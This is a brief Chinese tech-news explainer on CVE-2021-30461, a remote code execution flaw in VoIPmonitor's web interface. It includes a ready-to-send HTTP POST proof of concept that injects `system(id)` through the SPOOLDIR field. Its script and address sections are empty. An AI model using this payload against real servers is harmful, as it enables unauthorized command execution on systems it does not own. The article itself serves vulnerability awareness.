您好,登錄后才能下訂單哦!
本篇文章為大家展示了VoIPmonitor 遠程命令執行漏洞CVE-2021-30461怎么理解,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
VoIPmonitor Web界面用,允許未經身份驗證的遠程用戶觸發VoIPmonitor中的遠程PHP代碼執行漏洞。
VoIPmonitor < 24.60
訪問地址頁面:
POC:
POST /index.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 49 SPOOLDIR=test%22.system%28id%29.%22&recheck=annen
編寫嘗試腳本:
上述內容就是VoIPmonitor 遠程命令執行漏洞CVE-2021-30461怎么理解,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。